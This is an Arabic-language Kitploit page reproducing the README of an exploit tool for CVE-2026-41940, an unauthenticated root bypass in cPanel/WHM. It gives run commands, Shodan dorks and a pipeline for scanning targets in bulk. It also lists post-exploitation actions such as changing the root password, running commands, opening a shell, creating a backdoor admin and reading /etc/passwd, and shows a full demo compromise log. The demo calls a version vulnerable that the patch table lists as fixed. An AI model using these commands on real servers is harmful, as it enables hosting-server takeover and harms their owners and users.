Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-41940 — # cPanel وWHM - تجاوز المصادقة عبر حقن CRLF في ملف الجلسة | Kitploit
أدوات/GitHubGitHub/0xgh057r3c0n/cve-2026-41940
المصادقة والترخيصماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHub0xgh057r3c0n/cve-2026-41940

CVE-2026-41940

# cPanel وWHM - تجاوز المصادقة عبر حقن CRLF في ملف الجلسة

عرض المستودع
1منذ 10س 20دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔥 CVE-2026-41940 – تجاوز المصادقة في cPanel و WHM

cPanel

⚡ صلاحية جذر بدون مصادقة – حقن CRLF في ملف الجلسة ⚡
“سلسلة واحدة تحكمهم جميعًا.”

Python License No deps CVSS


🧠 الاستغلال باختصار

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  المرحلة 1  ──  إنشاء كوكي جلسة قبل المصادقة              │
│  المرحلة 2  ──  حقن CRLF عبر ترويسة `Authorization`       │
│  المرحلة 3  ──  تشغيل `do_token_denied` (خام → كاش)       │
│  المرحلة 4  ──  التحقق من صلاحية جذر WHM عبر JSON API     │
└─────────────────────────────────────────────────────────────┘

💥 النتيجة – وصول كامل بصلاحية الجذر إلى WHM، دون الحاجة لأي بيانات اعتماد.


📜 الترخيص

هذا المشروع مُصدَر بموجب رخصة MIT – يمكنك استخدامه وتعديله وتوزيعه بحرية، لكن لا تكن شريرًا 😈.
راجع ملف LICENSE للحصول على التفاصيل.


🛠️ التثبيت – حرفيًا سطر واحد

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-41940.git && cd CVE-2026-41940

صفر تبعيات – فقط مكتبة Python 3 القياسية.
لا تحتاج إلى pip أو virtualenv أو أي من تلك الضوضاء.


🚀 بدء سريع – شغّله الآن

هدف واحد

root@kitploit:~
./CVE-2026-41940.py -u https://target.com:2087

فحص جماعي من ملف

root@kitploit:~
./CVE-2026-41940.py -l targets.txt -t 20 -o results.json

أنبوب من الويب (Shodan, subfinder, إلخ)

root@kitploit:~
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | ./CVE-2026-41940.py -t 30

🎯 خيارات سطر الأوامر (الأشياء الجيدة)


💀 ترسانة ما بعد الاستغلال

بمجرد اختراقك للجهاز، يمكنك:

  • 🔍 سرد جميع حسابات cPanel – --action list
  • 🔑 تغيير كلمة مرور الجذر – --action passwd --passwd "h4ck3d!"
  • 🖥️ تنفيذ أوامر نظام – --action cmd --cmd "id;whoami"
  • 📡 شل تفاعلي – --action shell (طرفية WHM كاملة)
  • 👤 إنشاء مسؤول خلفي – --action adduser --new-user backdoor --new-domain evil.com --passwd "pwn3d"
  • 📂 قراءة الملفات (عبر الشل) – cat /etc/passwd
  • 📊 جمع معلومات الخادم – --action info

🧪 عرض توضيحي – ما ستراه

root@kitploit:~
$ ./CVE-2026-41940.py -u https://192.168.1.100:2087

  الإعدادات:
   الأهداف   : 1
   الخيوط    : 10
   المهلة    : 15 ثانية
   الإجراء   : فحص فقط

[10:23:15] [SCAN] بدء سلسلة استغلال من 4 مراحل... https://192.168.1.100:2087
[10:23:15] [INFO] تم اكتشاف اسم المضيف الأساسي: server.example.com
[10:23:15] [STEP] المرحلة 1/4 — إنشاء جلسة قبل المصادقة...
[10:23:16] [  OK] المرحلة 1: جلسة قبل المصادقة = 9a7f8e3d2c1b0a9f
[10:23:16] [STEP] المرحلة 2/4 — حقن CRLF عبر ترويسة Authorization...
[10:23:17] [  OK] المرحلة 2: HTTP 302 ← رمز=/cpsess1234567890
[10:23:17] [STEP] المرحلة 3/4 — تشغيل أداة do_token_denied (خام→كاش)...
[10:23:18] [  OK] المرحلة 3: HTTP 401 — تم تشغيل أداة do_token_denied
[10:23:18] [STEP] المرحلة 4/4 — التحقق من صلاحية جذر WHM...
[10:23:18] [INFO] المرحلة 4: HTTP 200  {"version":"11.118.0.63",...}
[10:23:18] [PWND] تم تأكيد CVE-2026-41940 — صلاحية جذر WHM! (v11.118.0.63 — مؤكد أنه قابل للاختراق)
[10:23:18] [PWND]   الرمز    : /cpsess1234567890
[10:23:18] [PWND]   الجلسة   : 9a7f8e3d2c1b0a9f
[10:23:18] [PWND]   الإصدار  : 11.118.0.63
[10:23:18] [PWND]   رابط API : https://192.168.1.100:2087/cpsess1234567890/json-api/version

  CVE-2026-41940 — اكتمل الفحص
  الوقت: 3.2 ثانية  ·  الأهداف: 1

  1 هدف قابل للاختراق

  [*] الهدف    : https://192.168.1.100:2087
  [*] الإصدار  : 11.118.0.63
  [*] الرمز    : /cpsess1234567890
  [*] رابط API : https://192.168.1.100:2087/cpsess1234567890/json-api/version
  [*] الجلسة   : 9a7f8e3d2c1b0a9f
  [*] الدليل   : {"version":"11.118.0.63",...}

🔎 استعلامات Shodan (ابحث عن فريستك)

root@kitploit:~
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087

📊 الإصدارات المتأثرة – حالة التصحيح

جميع الإصدارات الأقل من هذه البنيات قابلة للاختراق.


🕵️‍♂️ المؤلف والإشادات

0xgh057r3c0n – باحث أمني، مهندس عكسي، ومدمن قهوة.
GitHub | Twitter


⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لأغراض الاختبارات الأمنية المصرح بها والتعليم فقط.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. المؤلف والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
استخدمها بمسؤولية، واحصل دائمًا على الإذن أولاً.


🌟 الدعم / المساهمة

  • وجدت خطأ؟ افتح issue.
  • تريد تحسين الكود؟ طلبات السحب (PRs) مرحب بها.
  • أعجبتك الأداة؟ امنحها ⭐ على GitHub!

🔥 اخترق الكوكب، لكن ابقَ قانونيًا. 🔥

تنزيل الأداة
الخيارالوصف
-u, --urlرابط هدف واحد (مثل https://host:2087)
-l, --listملف يحتوي رابطًا واحدًا في كل سطر
--hostnameتجاوز ترويسة Host الأساسية (تُكتشف تلقائيًا)
-t, --threadsعدد الخيوط (الافتراضي: 10)
--timeoutالمهلة بالثواني (الافتراضي: 15)
--rate-limitالنوم بين الأهداف (بالثواني)
--actionما بعد الاستغلال: list, passwd, cmd, exec, info, version, shell, adduser
--passwdكلمة مرور جذر جديدة (مع --action passwd)
--cmdأمر نظام (مع --action cmd/exec)
--new-userاسم مستخدم cPanel جديد (مع --action adduser)
--new-domainنطاق cPanel جديد (مع --action adduser)
-o, --outputحفظ النتائج بصيغة JSON
الفرعالإصدار المُصحَّحالحالة
11.11011.110.0.97🛡️ تم الإصلاح
11.11811.118.0.63🛡️ تم الإصلاح
11.12611.126.0.54🛡️ تم الإصلاح
11.13211.132.0.29🛡️ تم الإصلاح
11.13411.134.0.20🛡️ تم الإصلاح
11.13611.136.0.5🛡️ تم الإصلاح